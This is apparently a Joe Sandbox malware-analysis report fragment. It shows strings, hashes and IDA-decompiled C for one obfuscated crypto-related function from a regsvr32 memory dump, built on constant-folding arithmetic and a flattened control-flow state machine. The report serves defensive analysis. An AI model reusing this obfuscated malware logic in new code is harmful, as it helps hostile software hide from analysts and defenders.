0x04b93d4d
0x04b93d4d
0x04b93d4d
0x00000000
0x04b93d59

Strings

Gd, xrefs: 04B93117
IF, xrefs: 04B93380
I,, xrefs: 04B92F85
-3n3, xrefs: 04B92F18
8j, xrefs: 04B935A6
3, xrefs: 04B92FBA
*a<, xrefs: 04B9354D
DJ3, xrefs: 04B92F28
!s9, xrefs: 04B93375
kn_, xrefs: 04B930C2
$7, xrefs: 04B93231
|I9, xrefs: 04B931A7
5S, xrefs: 04B9357D
Sg, xrefs: 04B93098
9I , xrefs: 04B93834
DO, xrefs: 04B9371F
1TPy, xrefs: 04B9310C

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !s9$*a<$-3n3$1TPy$5S$8j$9I $DJ3$IF$Sg$kn_$|I9$$7$3$DO$Gd$I,
API String ID: 0-3070105227
Opcode ID: 64130155f20100c8943a29ea391cf3b87b3631e7513ec7cbfb21469013a44219
Instruction ID: c8dc537c65e1240c17bafeb1c2cde737a943f19416238e0dbce5e1f899c9af5e
Opcode Fuzzy Hash: 64130155f20100c8943a29ea391cf3b87b3631e7513ec7cbfb21469013a44219
Instruction Fuzzy Hash: AD72E0715083819BD3B8CF25C58AB9FBBE1BBC4718F10892DE5D996260D7B09949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 04B83431, Relevance: 17.0, Strings: 13, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04B83431(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				unsigned int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				void* _t880;
				void* _t883;
				intOrPtr _t884;
				intOrPtr _t891;
				void* _t892;
				signed int _t894;
				char _t897;
				void* _t905;
				intOrPtr _t918;
				void* _t919;
				intOrPtr _t925;
				intOrPtr _t927;
				void* _t929;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				signed int _t950;
				signed int _t951;
				void* _t952;
				intOrPtr _t974;
				intOrPtr _t977;
				void* _t1017;
				intOrPtr _t1018;
				void* _t1038;
				intOrPtr _t1039;
				void* _t1041;
				void* _t1046;
				signed int* _t1048;
				signed int* _t1052;
				void* _t1054;

				_t1048 =  &_v448;
				_v436 = 0x369131;
				_v436 = _v436 >> 0xc;
				_v72 = __ecx;
				_t1046 = 0;
				_t935 = 0x47;
				_v436 = _v436 / _t935;
				_t929 = 0xda5043f;
				_t936 = 0x5f;
				_v436 = _v436 * 0x17;
				_v436 = _v436 ^ 0x4d42455f;
				_v208 = 0xf6fdfa;
				_v208 = _v208 | 0x2cc981c8;
				_v208 = _v208 ^ 0x2cfffdfb;
				_v424 = 0xd0dd87;
				_v424 = _v424 << 0xd;
				_v424 = _v424 | 0x1c0753be;
				_v424 = _v424 << 0xb;
				_v424 = _v424 ^ 0xbf9df000;
				_v168 = 0x27916c;
				_v168 = _v168 << 0xc;
				_v168 = _v168 ^ 0x7916c000;
				_v112 = 0xb477a9;
				_v112 = _v112 << 0xb;
				_v112 = _v112 ^ 0xa3bd4800;
				_v220 = 0xe97999;
				_v220 = _v220 + 0xffffec6a;
				_v220 = _v220 ^ 0x00e96603;
				_v204 = 0x9e1a7f;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0x0004f0d3;
				_v268 = 0x424ea5;
				_v268 = _v268 ^ 0x63de6ac8;
				_v268 = _v268 + 0xffff47e2;
				_v268 = _v268 ^ 0x639b6c4f;
				_v260 = 0xd00e0b;
				_v260 = _v260 + 0x7bec;
				_v260 = _v260 + 0x9dda;
				_v260 = _v260 ^ 0x00d127d1;
				_v200 = 0x4c3c29;
				_v200 = _v200 + 0xffffc8b9;
				_v200 = _v200 ^ 0x004c04e2;
				_v248 = 0x4debf8;
				_v248 = _v248 + 0xffff1b2a;
				_v248 = _v248 << 9;
				_v248 = _v248 ^ 0x9a0e4400;
				_v228 = 0x8afd86;
				_v228 = _v228 / _t936;
				_v228 = _v228 << 4;
				_v228 = _v228 ^ 0x001768a0;
				_v96 = 0x2eb3c6;
				_v96 = _v96 << 0xd;
				_v96 = _v96 ^ 0xd678c020;
				_v420 = 0x274aed;
				_v420 = _v420 | 0x31740d1a;
				_v420 = _v420 + 0xffff9582;
				_v420 = _v420 | 0x350cf820;
				_v420 = _v420 ^ 0x35767196;
				_v364 = 0x6881b7;
				_v364 = _v364 * 7;
				_v364 = _v364 + 0xffffc912;
				_v364 = _v364 * 0x25;
				_v364 = _v364 ^ 0x69b6ddf9;
				_v184 = 0xd44f20;
				_v184 = _v184 ^ 0xce5a0ea9;
				_v184 = _v184 ^ 0xce89b855;
				_v264 = 0x81d5a2;
				_v264 = _v264 >> 8;
				_v264 = _v264 ^ 0x29112c15;
				_v264 = _v264 ^ 0x291faa41;
				_v100 = 0x37cb15;
				_t937 = 6;
				_v100 = _v100 * 0x62;
				_v100 = _v100 ^ 0x1559514e;
				_v380 = 0xd5dbc2;
				_v380 = _v380 ^ 0x7753e321;
				_v380 = _v380 + 0xffff7b0c;
				_v380 = _v380 << 8;
				_v380 = _v380 ^ 0x85ba1641;
				_v176 = 0xe5b425;
				_v176 = _v176 ^ 0xa878a978;
				_v176 = _v176 ^ 0xa898c785;
				_v120 = 0xd260b8;
				_v120 = _v120 / _t937;
				_v120 = _v120 ^ 0x00230c57;
				_v288 = 0xdcc1d5;
				_v288 = _v288 | 0xf1bc740f;
				_v288 = _v288 >> 0xf;
				_v288 = _v288 ^ 0x000063e4;
				_v232 = 0xe5d66a;
				_t938 = 0x2c;
				_v232 = _v232 * 0x6c;
				_v232 = _v232 / _t938;
				_v232 = _v232 ^ 0x02301c7d;
				_v296 = 0x2a124;
				_v296 = _v296 | 0xd0f8a1f6;
				_v296 = _v296 >> 3;
				_v296 = _v296 ^ 0x1a145567;
				_v160 = 0xc3c6af;
				_v160 = _v160 + 0xd2dc;
				_v160 = _v160 ^ 0x00c22786;
				_v348 = 0x8f150e;
				_v348 = _v348 + 0xa59e;
				_t939 = 0x59;
				_v348 = _v348 / _t939;
				_v348 = _v348 >> 0xe;
				_v348 = _v348 ^ 0x00038203;
				_v412 = 0x22c1c6;
				_v412 = _v412 | 0x52a0f1e9;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0x5f9c;
				_v412 = _v412 ^ 0x0003206f;
				_v256 = 0x6eace8;
				_v256 = _v256 | 0x5e36471d;
				_v256 = _v256 + 0xaa22;
				_v256 = _v256 ^ 0x5e7c911d;
				_v372 = 0x114227;
				_v372 = _v372 << 0xe;
				_v372 = _v372 >> 4;
				_v372 = _v372 + 0xffff3250;
				_v372 = _v372 ^ 0x05091a3a;
				_v152 = 0xb2c113;
				_v152 = _v152 | 0xd4a79ff0;
				_v152 = _v152 ^ 0xd4b69369;
				_v404 = 0xac8dd0;
				_v404 = _v404 | 0xfe2c74c4;
				_v404 = _v404 + 0xfffff2df;
				_v404 = _v404 ^ 0xd6ca137b;
				_v404 = _v404 ^ 0x2865160f;
				_v92 = 0xc872d4;
				_v92 = _v92 ^ 0x1ab36d9e;
				_v92 = _v92 ^ 0x1a793755;
				_v104 = 0x4ab196;
				_v104 = _v104 << 8;
				_v104 = _v104 ^ 0x4ab50517;
				_v448 = 0xada0e7;
				_t940 = 0x71;
				_v448 = _v448 * 0x69;
				_v448 = _v448 ^ 0xf900bd50;
				_v448 = _v448 + 0x197e;
				_v448 = _v448 ^ 0xbe3853b0;
				_v396 = 0x11e923;
				_v396 = _v396 + 0x3954;
				_v396 = _v396 / _t940;
				_v396 = _v396 >> 0xc;
				_v396 = _v396 ^ 0x00018e0c;
				_v336 = 0x5f85c1;
				_v336 = _v336 | 0x2e05641a;
				_v336 = _v336 + 0xffffe3b2;
				_v336 = _v336 ^ 0x2e57dda5;
				_v144 = 0xd04b4f;
				_v144 = _v144 | 0x24a920ad;
				_v144 = _v144 ^ 0x24f2194c;
				_v332 = 0xa51135;
				_v332 = _v332 | 0x0e3f3b11;
				_v332 = _v332 << 1;
				_v332 = _v332 ^ 0x1d7bc296;
				_v432 = 0x91d3da;
				_v432 = _v432 ^ 0xfb7827da;
				_v432 = _v432 ^ 0x8307cadb;
				_v432 = _v432 ^ 0x96a6215b;
				_v432 = _v432 ^ 0xee460da5;
				_v440 = 0x76ea73;
				_t941 = 0x68;
				_v440 = _v440 * 0x64;
				_v440 = _v440 * 0x74;
				_v440 = _v440 + 0xffff4177;
				_v440 = _v440 ^ 0x0c5f6cc4;
				_v84 = 0xe35803;
				_v84 = _v84 << 2;
				_v84 = _v84 ^ 0x038e6518;
				_v416 = 0xaf3ba8;
				_v416 = _v416 / _t941;
				_v416 = _v416 << 4;
				_v416 = _v416 ^ 0x48935165;
				_v416 = _v416 ^ 0x4881449f;
				_v212 = 0x801900;
				_v212 = _v212 + 0xffff42b5;
				_v212 = _v212 ^ 0x0072cd25;
				_v308 = 0xdd451d;
				_v308 = _v308 << 7;
				_v308 = _v308 + 0xffff5c98;
				_v308 = _v308 ^ 0x6ea87981;
				_v400 = 0xde1a46;
				_v400 = _v400 + 0xffff765a;
				_v400 = _v400 / _t941;
				_v400 = _v400 << 9;
				_v400 = _v400 ^ 0x044894be;
				_v316 = 0xd965ab;
				_t942 = 0x67;
				_v316 = _v316 / _t942;
				_v316 = _v316 ^ 0xab5bfdd1;
				_v316 = _v316 ^ 0xab5ad192;
				_v408 = 0x2ea377;
				_v408 = _v408 ^ 0x7c77aa70;
				_v408 = _v408 * 0x1b;
				_t943 = 0x5b;
				_v408 = _v408 / _t943;
				_v408 = _v408 ^ 0x00544ec9;
				_v324 = 0xbe9a08;
				_t944 = 0x3b;
				_v324 = _v324 * 0x43;
				_v324 = _v324 >> 2;
				_v324 = _v324 ^ 0x0c769314;
				_v300 = 0x976b15;
				_v300 = _v300 + 0xffff7da5;
				_v300 = _v300 ^ 0x81b758ca;
				_v300 = _v300 ^ 0x81238506;
				_v180 = 0xcec496;
				_v180 = _v180 + 0xd8a;
				_v180 = _v180 ^ 0x00c56088;
				_v188 = 0xaed086;
				_v188 = _v188 / _t944;
				_v188 = _v188 ^ 0x0009ea52;
				_v196 = 0x3b56fa;
				_v196 = _v196 ^ 0xac6111bd;
				_v196 = _v196 ^ 0xac5e4370;
				_v292 = 0x9c517b;
				_t945 = 0xe;
				_v292 = _v292 * 0x4d;
				_v292 = _v292 << 0x10;
				_v292 = _v292 ^ 0x81f0babf;
				_v164 = 0xb8b001;
				_v164 = _v164 * 0x6d;
				_v164 = _v164 ^ 0x4ea63487;
				_v172 = 0xad6cfe;
				_v172 = _v172 + 0xffff2ed4;
				_v172 = _v172 ^ 0x00a06f33;
				_v392 = 0x7c182;
				_v392 = _v392 + 0xffff354a;
				_v392 = _v392 >> 9;
				_v392 = _v392 | 0x25902c29;
				_v392 = _v392 ^ 0x259a4e3f;
				_v384 = 0x5bc0d6;
				_v384 = _v384 << 1;
				_v384 = _v384 >> 3;
				_v384 = _v384 >> 0xb;
				_v384 = _v384 ^ 0x00007445;
				_v148 = 0xb53a42;
				_v148 = _v148 + 0x9a8c;
				_v148 = _v148 ^ 0x00ba1df9;
				_v340 = 0x4937cc;
				_v340 = _v340 / _t945;
				_v340 = _v340 * 0x55;
				_v340 = _v340 ^ 0x01b4526f;
				_v156 = 0xcb2355;
				_v156 = _v156 + 0x87d8;
				_v156 = _v156 ^ 0x00cab12c;
				_v276 = 0x1d3606;
				_v276 = _v276 ^ 0xef8573e3;
				_v276 = _v276 + 0xe74c;
				_v276 = _v276 ^ 0xef9451f2;
				_v124 = 0xea90d8;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 ^ 0x000c3a09;
				_v132 = 0x9d7def;
				_v132 = _v132 << 0xe;
				_v132 = _v132 ^ 0x5f719987;
				_v376 = 0x89d7c2;
				_v376 = _v376 + 0xfffff23e;
				_v376 = _v376 | 0x7c68b11f;
				_v376 = _v376 ^ 0xbb3726b5;
				_v376 = _v376 ^ 0xc7d510ca;
				_v140 = 0x76a014;
				_t946 = 0x62;
				_v140 = _v140 * 0x5d;
				_v140 = _v140 ^ 0x2b1c15f7;
				_v236 = 0x97a0b2;
				_v236 = _v236 + 0xb8c3;
				_v236 = _v236 / _t946;
				_v236 = _v236 ^ 0x00048326;
				_v244 = 0xf40f05;
				_v244 = _v244 >> 9;
				_v244 = _v244 + 0xffff2918;
				_v244 = _v244 ^ 0xfff951ac;
				_v252 = 0x8be7d4;
				_t947 = 0x63;
				_v252 = _v252 * 0x1e;
				_v252 = _v252 | 0x42cac185;
				_v252 = _v252 ^ 0x52ef1e67;
				_v116 = 0xbde76;
				_v116 = _v116 * 0x7b;
				_v116 = _v116 ^ 0x05b04958;
				_v328 = 0xeb1d65;
				_v328 = _v328 + 0xffffd1f9;
				_v328 = _v328 / _t947;
				_v328 = _v328 ^ 0x00025d34;
				_v280 = 0x68b6dc;
				_v280 = _v280 << 4;
				_v280 = _v280 + 0xffffca90;
				_v280 = _v280 ^ 0x06815cee;
				_v284 = 0x6fbf52;
				_t948 = 0x39;
				_v284 = _v284 / _t948;
				_v284 = _v284 >> 0xc;
				_v284 = _v284 ^ 0x000af32e;
				_v128 = 0xe16a7a;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0x85a6bd86;
				_v136 = 0xc45446;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x21b71382;
				_v356 = 0x71f336;
				_v356 = _v356 ^ 0x2de7f7fe;
				_v356 = _v356 ^ 0x8a07c7d3;
				_v356 = _v356 ^ 0x93c759d9;
				_v356 = _v356 ^ 0x3457e38a;
				_v444 = 0xc2e3ca;
				_v444 = _v444 + 0xd370;
				_v444 = _v444 * 0x17;
				_v444 = _v444 | 0x81628588;
				_v444 = _v444 ^ 0x91feaa64;
				_v216 = 0xda26e7;
				_v216 = _v216 | 0x60c5a9c9;
				_v216 = _v216 ^ 0x60dd12b5;
				_v192 = 0x3f7410;
				_v192 = _v192 ^ 0x1d5bbab7;
				_v192 = _v192 ^ 0x1d6fbf93;
				_v312 = 0x4ada65;
				_v312 = _v312 << 0xd;
				_v312 = _v312 >> 7;
				_v312 = _v312 ^ 0x00bfdaf9;
				_v272 = 0xabf11;
				_v272 = _v272 | 0xa59dca8e;
				_v272 = _v272 + 0x20a8;
				_v272 = _v272 ^ 0xa5a7fe59;
				_v224 = 0x8674d0;
				_t1041 = 0x129d0b2;
				_t1038 = 0x319c4b5;
				_t949 = 0x14;
				_v224 = _v224 / _t949;
				_v224 = _v224 ^ 0x000de1f0;
				_v320 = 0xda9bb0;
				_v320 = _v320 | 0x2a57cad9;
				_t950 = 0x36;
				_v320 = _v320 * 0xf;
				_v320 = _v320 ^ 0x831ebdeb;
				_v240 = 0xa163ed;
				_v240 = _v240 * 0xb;
				_v240 = _v240 ^ 0x8dcbf844;
				_v240 = _v240 ^ 0x8b2bfc33;
				_v428 = 0x5ed42b;
				_v428 = _v428 + 0xffff1d19;
				_v428 = _v428 * 0x50;
				_v428 = _v428 << 2;
				_v428 = _v428 ^ 0x75680dd8;
				_v88 = 0xfa72dc;
				_v88 = _v88 >> 7;
				_v88 = _v88 ^ 0x0007f8f8;
				_v388 = 0x10dc91;
				_v388 = _v388 / _t950;
				_v388 = _v388 >> 2;
				_v388 = _v388 | 0xaac1de12;
				_v388 = _v388 ^ 0xaac723cf;
				_v304 = 0xa7cb34;
				_v304 = _v304 ^ 0x1c82ce84;
				_v304 = _v304 + 0xffff27ec;
				_v304 = _v304 ^ 0x1c2c2c1b;
				_v360 = 0x85a407;
				_v360 = _v360 << 0x10;
				_v360 = _v360 ^ 0xf399b7e8;
				_t951 = 0x7b;
				_v360 = _v360 * 0xb;
				_v360 = _v360 ^ 0xc3d703da;
				_v108 = 0x2c5900;
				_v108 = _v108 | 0x18e96d33;
				_v108 = _v108 ^ 0x18efd740;
				_v368 = 0x82a9c5;
				_v368 = _v368 * 0x63;
				_v368 = _v368 / _t951;
				_v368 = _v368 << 9;
				_v368 = _v368 ^ 0xd254d318;
				_v344 = 0x646456;
				_v344 = _v344 | 0x8bd14a3d;
				_v344 = _v344 ^ 0xb757bf6b;
				_v344 = _v344 ^ 0xc7e8113d;
				_v344 = _v344 ^ 0xfb40f9ed;
				_v352 = 0x76afda;
				_v352 = _v352 | 0xbd2b6ebb;
				_v352 = _v352 + 0xffffcbc9;
				_v352 = _v352 << 5;
				_v352 = _v352 ^ 0xaffdfdca;
				while(1) {
					L1:
					_t1017 = 0xbed0fa7;
					_t952 = 0x2dc73db;
					_t880 = 0x45ef02b;
					goto L2;
					do {
						while(1) {
							L2:
							_t1054 = _t929 - _t880;
							if(_t1054 <= 0) {
								break;
							}
							__eflags = _t929 - 0xa3576f8;
							if(_t929 == 0xa3576f8) {
								_t1018 =  *0x4ba6224; // 0x0
								E04BA2B09(_v360,  *((intOrPtr*)(_t1018 + 0x50)), _v108, _v368);
								_t929 = _t1038;
								L25:
								_t880 = 0x45ef02b;
								_t952 = 0x2dc73db;
								_t1017 = 0xbed0fa7;
								goto L26;
							}
							__eflags = _t929 - _t1017;
							if(__eflags == 0) {
								_push(_v156);
								_push(_v340);
								_push(_v148);
								_t883 = E04B9E1F8(0x4b813f8, _v384, __eflags);
								_t884 =  *0x4ba6224; // 0x0
								__eflags = E04B8F288(_v268, _v276, _t883, _v124,  &_v76, _t884 + 0x54, _v132, 0x4b813f8, _v376, _v80, _v140) - _v260;
								_t929 =  ==  ? 0x2dc73db : _t1038;
								E04B9FECB(_t883, _v236, _v244, _v252, _v116);
								_t1048 =  &(_t1048[0xf]);
								L15:
								_t1041 = 0x129d0b2;
								goto L25;
							}
							__eflags = _t929 - 0xda5043f;
							if(__eflags != 0) {
								goto L26;
							}
							_t929 = 0x2e16ae;
						}
						if(_t1054 == 0) {
							_push(_v336);
							_push(_v396);
							_push(_v448);
							_t891 = E04B9E1F8(0x4b813a8, _v104, __eflags);
							_push(_v440);
							_t1039 = _t891;
							_push(_v432);
							_push(_v332);
							_t892 = E04B9E1F8(0x4b81498, _v144, __eflags);
							_v64 = _v424;
							_t894 = E04B900C5(_t1039, _v84, _v416);
							_v56 = _v56 & 0x00000000;
							_v60 = _t1039;
							_v52 = 1;
							_v68 = 2 + _t894 * 2;
							_v48 =  &_v68;
							_t897 = 0x20;
							_v76 = _t897;
							__eflags = E04B849A4(_v212,  &_v56, _v308,  &_v32, _v400, _v220, _v316,  &_v76, _v72, _t897, _t892, _v408, _v324) - _v204;
							_t929 =  ==  ? 0xbed0fa7 : 0x319c4b5;
							E04B9FECB(_t1039, _v300, _v180, _v188, _v196);
							E04B9FECB(_t892, _v292, _v164, _v172, _v392);
							_t1048 =  &(_t1048[0x18]);
							L17:
							_t1038 = 0x319c4b5;
							goto L15;
						}
						if(_t929 == 0x2e16ae) {
							_push(_v264);
							_push(_v184);
							_push(_v364);
							_t905 = E04B9E1F8(0x4b81468, _v420, __eflags);
							_push(_v120);
							_push(_v176);
							_push(_v380);
							__eflags = E04B8738A(_v288, _t905, _v232, _v168,  &_v80, E04B9E1F8(0x4b81318, _v100, __eflags), _v296) - _v112;
							_t929 =  ==  ? 0x45ef02b : 0x45eecb1;
							E04B9FECB(_t905, _v160, _v348, _v412, _v256);
							E04B9FECB(_t906, _v372, _v152, _v404, _v92);
							_t1048 =  &(_t1048[0x11]);
							goto L17;
						}
						if(_t929 == _t1041) {
							_push(_v216);
							_push(_v444);
							_push(_v356);
							_t1045 = E04B9E1F8(0x4b81438, _v136, __eflags);
							_v44 = _v436;
							_v40 = _v208;
							_v36 = _v96;
							_t918 =  *0x4ba6224; // 0x0
							_t974 =  *0x4ba6224; // 0x0
							_t919 = E04B850E8( *((intOrPtr*)(_t974 + 0x54)), _v192, _v312, _v272, _v224,  *((intOrPtr*)(_t918 + 0x50)), _v80, _v320, 0x4b81438, 0x4b81438,  &_v44, _v200, 0x4b81438, _v240, _t913);
							_t1052 =  &(_t1048[0x10]);
							__eflags = _t919 - _v248;
							if(_t919 != _v248) {
								_t929 = 0xa3576f8;
							} else {
								_t929 = _t1038;
								_t1046 = 1;
							}
							E04B9FECB(_t1045, _v428, _v88, _v388, _v304);
							_t1048 =  &(_t1052[3]);
							goto L15;
						}
						if(_t929 == _t952) {
							_t925 =  *0x4ba6224; // 0x0
							_push(_t952);
							_push(_t952);
							_t977 = E04B8C5D8( *((intOrPtr*)(_t925 + 0x54)));
							_t1048 =  &(_t1048[3]);
							_t927 =  *0x4ba6224; // 0x0
							__eflags = _t977;
							_t929 =  !=  ? _t1041 : _t1038;
							 *((intOrPtr*)(_t927 + 0x50)) = _t977;
							goto L1;
						}
						if(_t929 != _t1038) {
							goto L26;
						}
						E04B8F7FE(_v344, _v80, _v352, _v228);
						L9:
						return _t1046;
						L26:
						__eflags = _t929 - 0x45eecb1;
					} while (__eflags != 0);
					goto L9;
				}
			}

0x04b83431
0x04b83437
0x04b83441
0x04b83450
0x04b83457
0x04b83459
0x04b8345e
0x04b83469
0x04b8346e
0x04b8346f
0x04b83473
0x04b8347b
0x04b83486
0x04b83491
0x04b8349c
0x04b834a4
0x04b834a9
0x04b834b1
0x04b834b6
0x04b834be
0x04b834c9
0x04b834d1
0x04b834dc
0x04b834e7
0x04b834ef
0x04b834fa
0x04b83505
0x04b83510
0x04b8351b
0x04b83526
0x04b8352e
0x04b83539
0x04b83544
0x04b8354f
0x04b8355a
0x04b83565
0x04b83570
0x04b8357b
0x04b83586
0x04b83591
0x04b8359c
0x04b835a7
0x04b835b2
0x04b835bd
0x04b835c8
0x04b835d0
0x04b835db
0x04b835ef
0x04b835f6
0x04b835fe
0x04b83609
0x04b83614
0x04b8361c
0x04b83627
0x04b8362f
0x04b83637
0x04b8363f
0x04b83647
0x04b8364f
0x04b8365c
0x04b83660
0x04b8366d
0x04b83671
0x04b83679
0x04b83684
0x04b8368f
0x04b8369a
0x04b836a5
0x04b836af
0x04b836ba
0x04b836c5
0x04b836da
0x04b836dd
0x04b836e4
0x04b836ef
0x04b836f7
0x04b836ff
0x04b83707
0x04b8370c
0x04b83714
0x04b8371f
0x04b8372a
0x04b83735
0x04b8374b
0x04b83752
0x04b8375d
0x04b83768
0x04b83773
0x04b8377b
0x04b83786
0x04b83799
0x04b8379c
0x04b837ae
0x04b837b5
0x04b837c0
0x04b837cb
0x04b837d6
0x04b837de
0x04b837e9
0x04b837f4
0x04b837ff
0x04b8380a
0x04b83812
0x04b8381e
0x04b83821
0x04b83825
0x04b8382a
0x04b83832
0x04b8383a
0x04b83842
0x04b83847
0x04b8384f
0x04b83857
0x04b83862
0x04b8386d
0x04b83878
0x04b83883
0x04b8388b
0x04b83890
0x04b83895
0x04b8389d
0x04b838a5
0x04b838b0
0x04b838bb
0x04b838c6
0x04b838ce
0x04b838d6
0x04b838de
0x04b838e6
0x04b838ee
0x04b838f9
0x04b83904
0x04b8390f
0x04b8391a
0x04b83922
0x04b8392f
0x04b8393e
0x04b83941
0x04b83945
0x04b8394d
0x04b83955
0x04b8395d
0x04b83965
0x04b83975
0x04b83979
0x04b8397e
0x04b83986
0x04b83991
0x04b8399c
0x04b839a7
0x04b839b2
0x04b839bd
0x04b839c8
0x04b839d3
0x04b839de
0x04b839e9
0x04b839f0
0x04b839fb
0x04b83a03
0x04b83a0b
0x04b83a13
0x04b83a1b
0x04b83a23
0x04b83a30
0x04b83a33
0x04b83a3c
0x04b83a40
0x04b83a48
0x04b83a50
0x04b83a5b
0x04b83a63
0x04b83a6e
0x04b83a7e
0x04b83a82
0x04b83a87
0x04b83a8f
0x04b83a97
0x04b83aa2
0x04b83aad
0x04b83ab8
0x04b83ac3
0x04b83acb
0x04b83ad6
0x04b83ae1
0x04b83ae9
0x04b83af9
0x04b83afd
0x04b83b02
0x04b83b0a
0x04b83b1c
0x04b83b1f
0x04b83b26
0x04b83b31
0x04b83b3c
0x04b83b44
0x04b83b51
0x04b83b5d
0x04b83b62
0x04b83b68
0x04b83b70
0x04b83b83
0x04b83b86
0x04b83b8d
0x04b83b95
0x04b83ba0
0x04b83bab
0x04b83bb6
0x04b83bc1
0x04b83bcc
0x04b83bd7
0x04b83be2
0x04b83bed
0x04b83c03
0x04b83c0a
0x04b83c15
0x04b83c20
0x04b83c2b
0x04b83c36
0x04b83c49
0x04b83c4a
0x04b83c51
0x04b83c59
0x04b83c64
0x04b83c77
0x04b83c7e
0x04b83c89
0x04b83c94
0x04b83c9f
0x04b83caa
0x04b83cb2
0x04b83cba
0x04b83cbf
0x04b83cc7
0x04b83ccf
0x04b83cd7
0x04b83cdb
0x04b83ce0
0x04b83ce5
0x04b83ced
0x04b83cf8
0x04b83d03
0x04b83d0e
0x04b83d1c
0x04b83d25
0x04b83d29
0x04b83d31
0x04b83d3c
0x04b83d47
0x04b83d52
0x04b83d5d
0x04b83d68
0x04b83d73
0x04b83d7e
0x04b83d89
0x04b83d91
0x04b83d9c
0x04b83da7
0x04b83daf
0x04b83dba
0x04b83dc2
0x04b83dca
0x04b83dd2
0x04b83ddc
0x04b83de4
0x04b83df9
0x04b83dfc
0x04b83e03
0x04b83e0e
0x04b83e19
0x04b83e2f
0x04b83e36
0x04b83e41
0x04b83e4c
0x04b83e54
0x04b83e5f
0x04b83e6a
0x04b83e7d
0x04b83e80
0x04b83e87
0x04b83e92
0x04b83e9d
0x04b83eb0
0x04b83eb7
0x04b83ec2
0x04b83ecd
0x04b83ee3
0x04b83eea
0x04b83ef5
0x04b83f00
0x04b83f08
0x04b83f13
0x04b83f1e
0x04b83f30
0x04b83f33
0x04b83f3a
0x04b83f42
0x04b83f4d
0x04b83f58
0x04b83f60
0x04b83f6b
0x04b83f7e
0x04b83f85
0x04b83f90
0x04b83f98
0x04b83fa0
0x04b83fa8
0x04b83fb0
0x04b83fb8
0x04b83fc0
0x04b83fcd
0x04b83fd1
0x04b83fd9
0x04b83fe1
0x04b83fec
0x04b83ff7
0x04b84002
0x04b8400d
0x04b84018
0x04b84023
0x04b8402e
0x04b84036
0x04b8403e
0x04b84049
0x04b84054
0x04b8405f
0x04b8406a
0x04b84077
0x04b84082
0x04b8408e
0x04b84095
0x04b8409a
0x04b840a3
0x04b840ae
0x04b840b9
0x04b840cc
0x04b840cf
0x04b840d6
0x04b840e1
0x04b840f4
0x04b840fb
0x04b84106
0x04b84111
0x04b84119
0x04b84126
0x04b8412a
0x04b8412f
0x04b84137
0x04b84142
0x04b8414a
0x04b84155
0x04b84165
0x04b84169
0x04b8416e
0x04b84176
0x04b8417e
0x04b84189
0x04b84194
0x04b8419f
0x04b841aa
0x04b841b2
0x04b841b7
0x04b841c4
0x04b841c5
0x04b841c9
0x04b841d1
0x04b841dc
0x04b841e7
0x04b841f2
0x04b841ff
0x04b84209
0x04b8420d
0x04b84212
0x04b8421a
0x04b84222
0x04b8422a
0x04b84232
0x04b8423a
0x04b84242
0x04b8424a
0x04b84252
0x04b8425a
0x04b8425f
0x04b84267
0x04b84267
0x04b84267
0x04b8426c
0x04b84271
0x04b84271
0x04b84276
0x04b84276
0x04b84276
0x04b84276
0x04b84278
0x00000000
0x00000000
0x04b84628
0x04b8462e
0x04b84707
0x04b84714
0x04b8471b
0x04b8471d
0x04b8471d
0x04b84722
0x04b84727
0x00000000
0x04b84727
0x04b84634
0x04b84636
0x04b8464e
0x04b8465a
0x04b84661
0x04b8466c
0x04b84690
0x04b846c7
0x04b846de
0x04b846ef
0x04b846f4
0x04b843ef
0x04b843ef
0x00000000
0x04b843ef
0x04b84638
0x04b8463e
0x00000000
0x00000000
